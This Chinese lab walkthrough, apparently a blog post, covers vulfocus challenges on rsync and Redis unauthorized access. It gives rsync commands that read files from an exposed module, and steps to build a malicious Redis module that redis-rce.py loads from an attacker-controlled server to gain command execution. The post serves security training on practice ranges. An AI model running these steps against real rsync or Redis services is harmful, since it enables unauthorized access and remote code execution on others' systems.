未授权漏洞vulfocu靶场实战

rsync未授权漏洞

打开会有一个输入flag的文本框,所以我们需要查找flag如图

把网站的ip信息收集到如图

在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入

rsync rsync://123.58.236.76 :19358/src/

上面也说了flag在tmp目录下所以输入

rsync rsync://123.58.236.76:19358/src/tmp/

可以查到flag 如图

复制到靶场flag位置

可以看到通关

也可到宝塔终端输入相同的命令

效果一样

Redis未授权漏洞(CNVD-2019-21763)

进入宝塔服务器终端执行命令

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make

编译之后继续执行命令

git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/

将RedisModules-ExecuteCommand中的module.so这个文件复制到 同目录下redis-rce

cp module.so ./redis-rce

也可以这样复制

cp ./RedisModules-ExecuteCommand/module.so ./redis-rce

复制过去之后进入redis-rce目录查看到module.so已经复制过去了

安装一个pip 命令为下(前提得有yum) 否则没有python运行脚本

yum -y install python-pip

继续执行。安装一个文本文件

pip install -r requirements.txt

python redis-rce.py -r 123.58.236.76 (靶场ip) -p 40321(靶场端口) -L 121.4.55.89(宝塔服务器端口) -f module.so

宝塔服务器端口放行21000(默认端口)

执行之后

输入ls,直接弹出flag,输入到靶场即可通关

redis 未授权访问 (CNVD-2015-07557)

同上一个redis操作,同理输入代码

python redis-rce.py -r 123.58.236.76  -p 24460 -L 121.4.55.89 -f module.so

flag返回出复制到靶场

成功过关

两个redis操作都一样,改一下端口就OK了

  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值